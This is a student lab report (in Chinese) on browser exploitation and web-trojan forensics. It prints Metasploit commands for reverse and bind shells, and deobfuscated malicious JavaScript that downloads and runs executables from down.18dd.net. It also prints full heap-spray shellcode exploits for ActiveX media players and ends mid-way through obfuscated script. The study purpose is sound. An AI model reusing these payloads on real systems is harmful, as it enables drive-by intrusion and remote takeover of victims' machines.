20232937文兆宇 2023-2024-2 《网络攻防实践》实践十一报告

news2024/11/15 15:57:20

20232937文兆宇 2023-2024-2 《网络攻防实践》实践十一报告

1.实践内容

木马是一种带有恶意性质的远程控制软件。木马一般分为客户端和服务器端,客户端是本地使用的各种命令的控制台,而服务器端则是要给别人运行,只有运行过服务器端的计算机才能够完全受控。木马不会像病毒那样去感染文件,它的主要目的是窃取敏感信息,如银行账户、财务数据等,并可以进行远程控制、监视等活动。此外,木马具有很强的欺骗性和隐藏性,通常通过欺骗或诱骗的方式安装,并在用户的计算机中隐藏以实现控制用户计算机的目的。
为了防范木马攻击,用户应提高防范意识,不轻易浏览或打开陌生人发来的邮件和链接,使用性能好的杀毒软件、网络防火墙等,并及时更新系统和软件的安全补丁。同时,要养成良好的电脑使用习惯,以降低感染木马的可能性。
1.使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。 选择使用Metasploit中的MS06-014渗透攻击模块选择PAYLOAD为任意远程Shell连接,设置服务器地址和URL参数,运行exploit,构造出恶意网页木马脚本,在靶机环境中启动浏览器,验证与服务器的连通性,并访问恶意网页木马脚本URL, 在攻击机的Metasploit软件中查看渗透攻击状态,并通过成功渗透攻击后建立起的远程控制会话SESSION,在靶机上远程执行命令

2.取证分析实践—网页木马攻击场景分析
①首先你应该访问start.html,在这个文件中给出了new09.htm的地址,

②在进入 htm 后,每解密出一个文件地址,请对其作 32 位 MD5 散列,以散列值为文件名到
http://192.168.68.253/scom/hashed/
哈希值下去下载对应的文件(注意:文件名中的英文字母为小写,且没有扩展名),即为解密出的地址对应的文件。

③如果解密出的地址给出的是网页或脚本文件,请继续解密。

④如果解密出的地址是二进制程序文件,请进行静态反汇编或动态调试。

⑤重复以上过程直到这些文件被全部分析完成。
3.攻防对抗实践—web浏览器渗透攻击攻防

攻击方使用Metasploit构造出至少两个不同Web浏览端软件安全漏洞的渗透攻击代码,并进行混淆处理之后组装成一个URL,通过具有欺骗性的电子邮件发送给防守方。

防守方对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态,并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。

2.实践过程

2.1 web浏览器渗透攻击

攻击机:kali 192.168.200.3
靶机:win2k 192.168.200.2
用kali的msf 搜索MS06-014 使用此模块
在这里插入图片描述设置攻击载荷,并执行,可以看到启动了木马网址http://192.168.200.3:8080/HBRNDp,

set payload generic/shell_reverse_tcp
set RHOST 192.168.200.8
set LHOST 192.168.200.3
exploit

在这里插入图片描述用win2k访问此含木马的网页,可以看到返回了一串字符串
在这里插入图片描述
返回kali可以发现已经创建会话成功
在这里插入图片描述进入会话,并输入命令验证是否攻击成功,下图攻击已经成功。

sessions
sessions -i 1
ipconfig

在这里插入图片描述

2.2 取证分析实际

2.2.1 找到四个hash

打开start.html文件,发现了new09.htm网址

在这里插入图片描述打开new网页,发现了两个js文件,对这两个文件做hash
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
访问这两个hash值的文件,发现了一个xxtea的解密步骤
在这里插入图片描述在这里插入图片描述解析xxtea的密钥 为script 用此密钥进行解密
在这里插入图片描述
利用在线网站进行xxtea解密,得到最后的结果

在这里插入图片描述

function init(){document.write();}
window.onload = init;
if(document.cookie.indexOf('OK')==-1){
try{var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie='ce=windowsxp;path=/;expires='+expires.toGMTString();
if(e!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/1.js><\/script>")}
else{
try{var f;var storm=new ActiveXObject("MPS.StormPlayer");}
catch(f){};
finally{if(f!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/b.js><\/script>")}}
try{var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/pps.js><\/script>")}}
try{var h;var obj=new ActiveXObject("BaiduBar.Tool");}
catch(h){};
finally{if(h!="[object Error]"){
obj.DloadDS("http://down.18dd.net/bb/bd.cab", "bd.exe", 0)}}
}}}

在代码中发现这四个js文件,同样做md5处理 在文件夹中找到对应的hash值

http://aa.18dd.net/aa/1.js
http://aa.18dd.net/aa/b.js
http://aa.18dd.net/aa/pps.js
http://down.18dd.net/bb/bd.cab
5d7e9058a857aa2abee820d5473c5fa4
3870c28cc279d457746b3796a262f166
5f0b8bf0385314dbe0e5ec95e6abedc2
1c1d7b3539a617517c49eee4120783b2
2.2.2 分析四个hash,找到四个exe

对于5d这个文件,解析后发现他在执行014.exe
在这里插入图片描述


var url="http://down.18dd.net/bb/014.exe";try{var xml=ado.CreateObject("Microsoft.XMLHTTP","");xml.Open

("GET",url,0);xml.Send();as.type=1;as.open();as.write(xml.responseBody);path="..\\ntuser.com";as.savetofile(path,2);as.close

();var shell=ado.createobject("Shell.Application","");shell.ShellExecute("cmd.exe","/c "+path,"","open",0)}catch(e){}

对于38这个文件,首先利用packed解密,解密出来后根据url特性,(0x2f–/)进行解析,发现其使用了bf.exe

eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 1=29("%10%10");5 26=20;5 14=29("%82%3"+"%81%10%83%84%87%3%86%85"+"%79%78%72%22%71%70%69%73"+"%74%77%17%76%75%88%89%103"+"%17%102%101%104%105%108%107%106"+"%100%99%93%92%25%91%68%94"+"%95%98%97%25%96%109%63%37"+"%31%39%41%40%19%42%43%45"+"%38%3%44%46%35%12%32%22"+"%33%36%34%3%19%67%61%60"+"%59%62%47%66%65%64%58%57"+"%16%24%51%50%49%24%48%16"+"%52%53%56%55%54%90%152%168"+"%167%166%165%110%170%173%12%172"+"%171%164%12%157%156%155%154%158"+"%159%162%161%160%175%185%189%188"+"%187%191%193%195%194%23%192%190"+"%186%179%178%177%176%180%181%184"+"%183%182%174%153%18%11%125%124"+"%15%123%122%126%127%130%21%129"+"%128%121%120%114%18%11%113%112"+"%111%115%116%119%118%117%21%131"+"%132%146%11%144%147%148%151%150%149%143%142%136%23%135%134%133%137%15%3");5 4=26+14.6;13(1.6<4)1+=1;28=1.30(0,4);2=1.30(0,1.6-4);13(2.6+4<138)2=2+2+28;27=141 140();139(7=0;7<169;7++)27[7]=2+14;5 8=\'\';13(8.6<145)8+="\\9\\9\\9\\9";163.80(8)',10,196,'|bigblock|block|u0000|slackspace|var|length|x|buffer|x0a|u9090|u0041|u57ff|while|shellcode|u6578|u4320|ufb03|u7972|uc683||u6461|ud88b|u7465|u4343|u468b|headersize|memory|fillblock|unescape|substring|u008b|u5afc|u016a|u0057|u5652|ue859|uc103|u6ae8|uc303|uf78b|ufa8b|u8b0e|u6ad0|u8300|u5904|u0dc6|u5e80|u03c6|u632f|u03c7|u6643|u206a|uff53|u5c03|u04c7|uec57|u646d|u6303|ufa75|u803e|u8046|u3680|u02e1|uc7dc|u8b40|uec83|u5613|ud1c3|u1e74|u8b3c|u738b|u0840|u0378|u8bf3|u3314|u4e8b|u207e|u8bad|u1c70|rawParse|u9000|uf3e9|u5a90|ua164|u8b0c|u408b|u0030|u56ed|u5157|u2e61|u0324|ucd8b|u5e5f|u03e1|u33c1|u031c|u088b|u66c9|u59e9|ue245|u0e6a|uf28b|u3f8b|uf359|u74a6|ufcef|u835f|u5908|uc1c3|u50c0|u6e6f|u6d6c|u7275|u6172|u5500|u4c52|u6f6c|u6e77|u6f44|u6269|u4c64|u7845|u0063|u456e|u6957|u7469|u6854|u616f|u4c00|u6572|u6f54|u6946|u6662|u2f62|u622f|u6e2e|u652e|0x40000|for|Array|new|u6464|u3831|u7468|4068|u656c|u7074|u2f3a|u2e6e|u776f|u642f|uc765|u6f74|uff58|u0040|u2451|u68f0|u33d0|uacc0|u5251|uf975|uc085|storm|u5300|u3300|u0065|u7804|u0344|300|u5350|u6adc|u8bfc|u5056|u6365|u5356|u6547|u0073|u7365|u7264|u5374|u7379|u7269|u446d|u6574|ud2ff|u6441|u33ee|ue2ab|u595a|u636f|uc3c0|u7250|u0ce8|u47ff|uffff'.split('|'),0,{}))

在这里插入图片描述

var bigblock=unescape("%u9090%u9090");var headersize=20;var shellcode=unescape("%uf3e9%u0000"+"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c"+"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378"+"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b"+"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%ufcef"+"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1"+"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103"+"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904"+"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b"+"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e"+"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d"+"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320"+"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344"+"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc"+"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0"+"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab"+"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f"+"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574"+"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e"+"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00"+"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c"+"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54"+"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u6662%u652e%u6578%u0000");var slackspace=headersize+shellcode.length;while(bigblock.length<slackspace)bigblock+=bigblock;fillblock=bigblock.substring(0,slackspace);block=bigblock.substring(0,bigblock.length-slackspace);while(block.length+slackspace<0x40000)block=block+block+fillblock;memory=new Array();for(x=0;x<300;x++)memory[x]=block+shellcode;var buffer='';while(buffer.length<4068)buffer+="\x0a\x0a\x0a\x0a";storm.rawParse(buffer)

在这里插入图片描述对于5f这个文件,同样道理,用字符串先解析出来,得到路径
http://down.18dd.net/bb/pps.exe
即使用了pps.exe文件

eval("\57\52\45\165\66\66\143\71\45\165\60\70\70\142\45\165\64\66\70\142\45\165\60\63\61\143\45\165\143\61\143\63\45\165\60\62\145\61\45\165\143\61\60\63\42\40\53\15\12\42\45\165\60\60\70\142\45\165\143\63\60\63\45\165\146\141\70\142\45\165\146\67\70\142\45\165\143\66\70\63\45\165\70\142\60\145\45\165\66\141\144\60\45\165\65\71\60\64\42\40\53\15\12\42\45\165\66\141\145\70\45\165\60\60\60\60\45\165\70\63\60\60\45\165\60\144\143\66\45\165\65\66\65\62\45\165\65\67\146\146\45\165\65\141\146\143\45\165\144\70\70\142\42\40\53\15\12\42\45\165\60\61\66\141\45\165\145\70\65\71\45\165\60\60\65\67\45\165\60\60\60\60\45\165\143\66\70\63\45\165\65\66\61\63\45\165\70\60\64\66\45\165\70\60\63\145\42\40\53\15\12\42\45\165\146\141\67\65\45\165\63\66\70\60\45\165\65\145\70\60\45\165\145\143\70\63\45\165\70\142\64\60\45\165\143\67\144\143\45\165\66\63\60\63\45\165\66\64\66\144\42\40\53\15\12\42\45\165\64\63\62\60\45\165\64\63\64\63\45\165\66\66\64\63\45\165\60\63\143\67\45\165\66\63\62\146\45\165\64\63\64\63\45\165\60\63\143\66\45\165\64\63\62\60\42\40\53\15\12\42\45\165\62\60\66\141\45\165\146\146\65\63\45\165\145\143\65\67\45\165\52\57\15\12\160\160\163\75\50\144\157\143\165\155\145\156\164\56\143\162\145\141\164\145\105\154\145\155\145\156\164\50\42\157\142\152\145\143\164\42\51\51\73\15\12\160\160\163\56\163\145\164\101\164\164\162\151\142\165\164\145\50\42\143\154\141\163\163\151\144\42\54\42\143\154\163\151\144\72\65\105\103\67\103\65\61\61\55\103\104\60\106\55\64\62\105\66\55\70\63\60\103\55\61\102\104\71\70\70\62\106\63\64\65\70\42\51\15\12\166\141\162\40\163\150\145\154\154\143\157\144\145\40\75\40\165\156\145\163\143\141\160\145\50\42\45\165\146\63\145\71\45\165\60\60\60\60\42\53\15\12\42\45\165\71\60\60\60\45\165\71\60\71\60\45\165\65\141\71\60\45\165\141\61\66\64\45\165\60\60\63\60\45\165\60\60\60\60\45\165\64\60\70\142\45\165\70\142\60\143\42\40\53\15\12\42\45\165\61\143\67\60\45\165\70\142\141\144\45\165\60\70\64\60\45\165\144\70\70\142\45\165\67\63\70\142\45\165\70\142\63\143\45\165\61\145\67\64\45\165\60\63\67\70\42\40\53\15\12\42\45\165\70\142\146\63\45\165\62\60\67\145\45\165\146\142\60\63\45\165\64\145\70\142\45\165\63\63\61\64\45\165\65\66\145\144\45\165\65\61\65\67\45\165\63\146\70\142\42\40\53\15\12\42\45\165\146\142\60\63\45\165\146\62\70\142\45\165\60\145\66\141\45\165\146\63\65\71\45\165\67\64\141\66\45\165\65\71\60\70\45\165\70\63\65\146\45\165\60\64\143\67\42\40\53\15\12\42\45\165\145\62\64\65\45\165\65\71\145\71\45\165\65\145\65\146\45\165\143\144\70\142\45\165\64\66\70\142\45\165\60\63\62\64\45\165\144\61\143\63\45\165\60\63\145\61\42\40\53\15\12\42\45\165\63\63\143\61\45\165\66\66\143\71\45\165\60\70\70\142\45\165\64\66\70\142\45\165\60\63\61\143\45\165\143\61\143\63\45\165\60\62\145\61\45\165\143\61\60\63\42\40\53\15\12\42\45\165\60\60\70\142\45\165\143\63\60\63\45\165\146\141\70\142\45\165\146\67\70\142\45\165\143\66\70\63\45\165\70\142\60\145\45\165\66\141\144\60\45\165\65\71\60\64\42\40\53\15\12\42\45\165\66\141\145\70\45\165\60\60\60\60\45\165\70\63\60\60\45\165\60\144\143\66\45\165\65\66\65\62\45\165\65\67\146\146\45\165\65\141\146\143\45\165\144\70\70\142\42\40\53\15\12\42\45\165\60\61\66\141\45\165\145\70\65\71\45\165\60\60\65\67\45\165\60\60\60\60\45\165\143\66\70\63\45\165\65\66\61\63\45\165\70\60\64\66\45\165\70\60\63\145\42\40\53\15\12\42\45\165\146\141\67\65\45\165\63\66\70\60\45\165\65\145\70\60\45\165\145\143\70\63\45\165\70\142\64\60\45\165\143\67\144\143\45\165\66\63\60\63\45\165\66\64\66\144\42\40\53\15\12\42\45\165\64\63\62\60\45\165\64\63\64\63\45\165\66\66\64\63\45\165\60\63\143\67\45\165\66\63\62\146\45\165\64\63\64\63\45\165\60\63\143\66\45\165\64\63\62\60\42\40\53\15\12\42\45\165\62\60\66\141\45\165\146\146\65\63\45\165\145\143\65\67\45\165\60\64\143\67\45\165\65\143\60\63\45\165\62\145\66\61\45\165\143\67\66\65\45\165\60\63\64\64\42\40\53\15\12\42\45\165\67\70\60\64\45\165\60\60\66\65\45\165\63\63\60\60\45\165\65\60\143\60\45\165\65\63\65\60\45\165\65\60\65\66\45\165\65\67\146\146\45\165\70\142\146\143\42\40\53\15\12\42\45\165\66\141\144\143\45\165\65\63\60\60\45\165\65\67\146\146\45\165\66\70\146\60\45\165\62\64\65\61\45\165\60\60\64\60\45\165\146\146\65\70\45\165\63\63\144\60\42\40\53\15\12\42\45\165\141\143\143\60\45\165\143\60\70\65\45\165\146\71\67\65\45\165\65\62\65\61\45\165\65\63\65\66\45\165\144\62\146\146\45\165\65\71\65\141\45\165\145\62\141\142\42\40\53\15\12\42\45\165\63\63\145\145\45\165\143\63\143\60\45\165\60\143\145\70\45\165\146\146\146\146\45\165\64\67\146\146\45\165\67\64\66\65\45\165\67\62\65\60\45\165\66\63\66\146\42\40\53\15\12\42\45\165\66\64\64\61\45\165\67\62\66\64\45\165\67\63\66\65\45\165\60\60\67\63\45\165\66\65\64\67\45\165\65\63\67\64\45\165\67\63\67\71\45\165\66\65\67\64\42\40\53\15\12\42\45\165\64\64\66\144\45\165\67\62\66\71\45\165\66\63\66\65\45\165\66\146\67\64\45\165\67\71\67\62\45\165\60\60\64\61\45\165\66\71\65\67\45\165\64\65\66\145\42\40\53\15\12\42\45\165\66\65\67\70\45\165\60\60\66\63\45\165\67\70\64\65\45\165\67\64\66\71\45\165\66\70\65\64\45\165\66\65\67\62\45\165\66\64\66\61\45\165\64\143\60\60\42\40\53\15\12\42\45\165\66\61\66\146\45\165\64\143\66\64\45\165\66\62\66\71\45\165\66\61\67\62\45\165\67\71\67\62\45\165\60\60\64\61\45\165\67\62\67\65\45\165\66\144\66\143\42\40\53\15\12\42\45\165\66\145\66\146\45\165\65\65\60\60\45\165\64\143\65\62\45\165\66\146\64\64\45\165\66\145\67\67\45\165\66\146\66\143\45\165\66\64\66\61\45\165\66\146\65\64\42\40\53\15\12\42\45\165\66\71\64\66\45\165\66\65\66\143\45\165\60\60\64\61\45\165\67\64\66\70\45\165\67\60\67\64\45\165\62\146\63\141\45\165\66\64\62\146\45\165\67\67\66\146\45\165\62\145\66\145\45\165\63\70\63\61\45\165\66\64\66\64\45\165\66\145\62\145\45\165\67\64\66\65\45\165\66\62\62\146\45\165\62\146\66\62\45\165\67\60\67\60\45\165\62\145\67\63\45\165\67\70\66\65\45\165\60\60\66\65\42\51\73\15\12\166\141\162\40\142\151\147\142\154\157\143\153\40\75\40\165\156\145\163\143\141\160\145\50\42\45\165\71\60\71\60\45\165\71\60\71\60\42\51\73\15\12\166\141\162\40\150\145\141\144\145\162\163\151\172\145\40\75\40\62\60\73\15\12\166\141\162\40\163\154\141\143\153\163\160\141\143\145\40\75\40\150\145\141\144\145\162\163\151\172\145\53\163\150\145\154\154\143\157\144\145\56\154\145\156\147\164\150\73\15\12\167\150\151\154\145\40\50\142\151\147\142\154\157\143\153\56\154\145\156\147\164\150\74\163\154\141\143\153\163\160\141\143\145\51\40\142\151\147\142\154\157\143\153\53\75\142\151\147\142\154\157\143\153\73\15\12\146\151\154\154\142\154\157\143\153\40\75\40\142\151\147\142\154\157\143\153\56\163\165\142\163\164\162\151\156\147\50\60\54\40\163\154\141\143\153\163\160\141\143\145\51\73\15\12\142\154\157\143\153\40\75\40\142\151\147\142\154\157\143\153\56\163\165\142\163\164\162\151\156\147\50\60\54\40\142\151\147\142\154\157\143\153\56\154\145\156\147\164\150\55\163\154\141\143\153\163\160\141\143\145\51\73\15\12\167\150\151\154\145\50\142\154\157\143\153\56\154\145\156\147\164\150\53\163\154\141\143\153\163\160\141\143\145\74\60\170\64\60\60\60\60\51\40\142\154\157\143\153\40\75\40\142\154\157\143\153\53\142\154\157\143\153\53\146\151\154\154\142\154\157\143\153\73\15\12\155\145\155\157\162\171\40\75\40\156\145\167\40\101\162\162\141\171\50\51\73\15\12\146\157\162\40\50\170\75\60\73\40\170\74\64\60\60\73\40\170\53\53\51\40\155\145\155\157\162\171\133\170\135\40\75\40\142\154\157\143\153\40\53\40\163\150\145\154\154\143\157\144\145\73\15\12\166\141\162\40\142\165\146\146\145\162\40\75\40\47\47\73\15\12\167\150\151\154\145\40\50\142\165\146\146\145\162\56\154\145\156\147\164\150\40\74\40\65\60\60\51\40\142\165\146\146\145\162\53\75\42\134\170\60\141\134\170\60\141\134\170\60\141\134\170\60\141\42\73\15\12\160\160\163\56\114\157\147\157\40\75\40\142\165\146\146\145\162\15\12")

/*%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u*/
pps=(document.createElement("object"));
pps.setAttribute("classid","clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458")
var shellcode = unescape("%uf3e9%u0000"+
"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" +
"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" +
"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7" +
"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" +
"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" +
"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" +
"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" +
"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" +
"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" +
"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" +
"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" +
"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" +
"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" +
"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" +
"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u7070%u2e73%u7865%u0065");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<400; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 500) buffer+="\x0a\x0a\x0a\x0a";
pps.Logo = buffer

对于1C文件,本身就是一个压缩包,拿到bd.exe
在这里插入图片描述

2.2.3 分析四个exe

这四个文件经过分析都是一样的,拿其中一个进行举例,用ida进行分析
在这里插入图片描述一些导入表操作
在这里插入图片描述
下载文件操作
在这里插入图片描述

2.3Web浏览器渗透攻击攻防

攻击方:wzy
防守方:why

攻击

在msf里寻找火狐漏洞,use 34

在这里插入图片描述
在这里插入图片描述

配置攻击载荷进行攻击

set payload windows/shell/bind_tcp
set URIPATH /
run

配置钓鱼邮件
在这里插入图片描述
受害者点击后 成功
在这里插入图片描述

防守

再点击钓鱼邮件后,弹出对话框
在这里插入图片描述


      <script>
      var N={"\u005f\153\145\x79\u0053\x74\162":(function () { var sq="9+/=",oP="345678",I="hijklmnopqrstuvwxyz012",b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg"; return b+I+oP+sq })(),"\137\u0075\x74\u0066\u0038\u005f\145\u006e\143\u006f\u0064\145":function(x){x=x[((function () { var jM="ce",m="la",cs="rep"; return cs+m+jM })())](/\r\n/g,String.fromCharCode(92,0x6e));var W="";var S_;for(S_=('XsCxjWSWP'.length-9);S_<x[(String.fromCharCode(0x6c,101,0156,0x67,0164,104))];S_++){var V=x[((function () { var h="t",nY="odeA",XH="C",JG="r",$="cha"; return $+JG+XH+nY+h })())](S_);if(V<(0x1*74+54)){W+=String[((function () { var o$="ode",WA="rC",A="fromCha"; return A+WA+o$ })())](V);}else if((V>('u'.length*105+22))&&(V<('ww'.length*(01*('x'.length*(0x2*0xca+43)+269)+251)+114))){W+=String[(String.fromCharCode(0146,0162,111,109,0x43,0x68,0x61,0162,0103,0157,0144,0145))]((V>>'wjBNpq'.length)|('T'.length*0201+63));W+=String[(String.fromCharCode(0x66,0x72,111,0x6d,0103,0x68,0141,0162,0103,0x6f,0x64,0x65))]((V&(0xc*'NpJlK'.length+3))|(2*('t'.length*('T'.length*('HD'.length*8+6)+12)+24)+12));}else {W+=String[((function () { var hz="rCode",Z="fromCha"; return Z+hz })())]((V>>(0x3*4+0))|('w'.length*(03*(0x1*051+21)+4)+34));W+=String[((function () { var s="ode",S="rC",ro="fromCha"; return ro+S+s })())](((V>>'dnqbDf'.length)&(1*60+3))|(01*('w'.length*50+27)+51));W+=String[(String.fromCharCode(102,0x72,0157,0x6d,0103,0x68,0141,114,67,111,0x64,101))]((V&('I'.length*0x2d+18))|(1*93+35));}}return W;},"\145\156\143\x6f\x64\u0065":function(x){var V="";var yw,bF,$,q7,zF,C,m9;var o=('DAF'.length-3);x=N[((function () { var P="code",BY="n",H="f8_e",Xe="t",W="_u"; return W+Xe+H+BY+P })())](x);while(o<x[((function () { var NC="th",B2="g",mK="len"; return mK+B2+NC })())]){yw=x[((function () { var JC="t",nw="CodeA",r="char"; return r+nw+JC })())](o++);bF=x[(String.fromCharCode(0x63,0150,97,0x72,0x43,111,0144,0x65,0x41,116))](o++);$=x[((function () { var q0="t",t="deA",jN="charCo"; return jN+t+q0 })())](o++);q7=yw>>'iL'.length;zF=((yw&'Wii'.length)<<'ykxw'.length)|(bF>>'rWqT'.length);C=((bF&('lMN'.length*'mGfZ'.length+3))<<'Qe'.length)|($>>'WdqfNV'.length);m9=$&(02*0x1b+9);if(window[(function () { var ZM="aN",R="isN"; return R+ZM })()](bF)){C=m9=('b'.length*('L'.length*0x1a+10)+28);}else if(window[String.fromCharCode(0151,0163,0x4e,0x61,78)]($)){m9=(0x1*('V'.length*('BDBRGi'.length*5+4)+25)+5);}V=V+this[(String.fromCharCode(95,0153,0145,121,0x53,116,114))][(String.fromCharCode(99,0x68,0x61,0x72,65,116))](q7)+this[((function () { var Hl="r",Ps="eySt",ZQ="k",EY="_"; return EY+ZQ+Ps+Hl })())][((function () { var We="t",o2="arA",iG="ch"; return iG+o2+We })())](zF)+this[((function () { var Yc="r",to="eySt",FF="k",QF="_"; return QF+FF+to+Yc })())][(String.fromCharCode(99,0x68,0x61,0x72,0x41,116))](C)+this[(String.fromCharCode(0137,0153,101,0171,0123,116,114))][(String.fromCharCode(0143,0150,97,0162,0x41,0x74))](m9);}return V;},"\x64\145\u0063\u006f\u0064\145":function(x){var B2="";var e,X,D;var vr,HY,pg,w;var l=('IXA'.length-3);x=x[((function () { var s="e",lv="c",An="pla",d="re"; return d+An+lv+s })())](/[^A-Za-z0-9\+\/\\=]/g,"");while(l<x[((function () { var kV="th",F$="leng"; return F$+kV })())]){vr=this[((function () { var Px="tr",W_="keyS",j="_"; return j+W_+Px })())][(String.fromCharCode(0x69,110,0144,0x65,120,0117,0146))](x[(String.fromCharCode(0143,0x68,0141,0x72,0101,0164))](l++));HY=this[(String.fromCharCode(0x5f,0153,0x65,0x79,0123,0x74,0162))][((function () { var x8="exOf",Sm="ind"; return Sm+x8 })())](x[((function () { var S="t",Nh="rA",z="cha"; return z+Nh+S })())](l++));pg=this[(String.fromCharCode(0137,0x6b,101,0x79,0x53,0164,0x72))][((function () { var u="f",pt="xO",CN="de",Od="in"; return Od+CN+pt+u })())](x[((function () { var W="At",Q2="char"; return Q2+W })())](l++));w=this[(String.fromCharCode(95,0153,0x65,121,0123,0164,0162))][(String.fromCharCode(0x69,110,100,0x65,0170,0117,102))](x[(String.fromCharCode(0143,104,0x61,0x72,65,0164))](l++));e=(vr<<'YA'.length)|(HY>>'JOIl'.length);X=((HY&('sJWKnrH'.length*'Fh'.length+1))<<'gLqM'.length)|(pg>>'YQ'.length);D=((pg&'vQQ'.length)<<'xHEKuq'.length)|w;B2=B2+String[((function () { var kg="e",t="CharCod",J="om",ZO="fr"; return ZO+J+t+kg })())](e);if(pg!=(2*26+12)){B2=B2+String[(String.fromCharCode(102,0x72,0x6f,0155,67,104,0141,0x72,67,0157,0144,0145))](X);}if(w!=('u'.length*38+26)){B2=B2+String[((function () { var C="Code",Iq="romChar",PZ="f"; return PZ+Iq+C })())](D);}}B2=N[((function () { var hB="ode",gB="f8_dec",S="_ut"; return S+gB+hB })())](B2);return B2;},"\x5f\165\164\u0066\70\137\u0064\145\u0063\157\x64\x65":function(s){var Bk="";var m=('DyABkEMBkY'.length-10);var ck=('KfNu'.length-4);var j=('jqtQr'.length-5);var Q=('gEimp'.length-5);while(m<s[((function () { var C="th",um="g",$x="len"; return $x+um+C })())]){ck=s[((function () { var PL="deAt",AY="charCo"; return AY+PL })())](m);if(ck<('SC'.length*(3*16+1)+30)){Bk+=String[(String.fromCharCode(0x66,0x72,0157,0x6d,67,0150,97,0x72,67,0157,0144,101))](ck);m++;}else if((ck>('cXZ'.length*(('dVP'.length*3+2)*0x5+1)+23))&&(ck<(02*101+22))){j=s[((function () { var sR="odeAt",Z="arC",D="ch"; return D+Z+sR 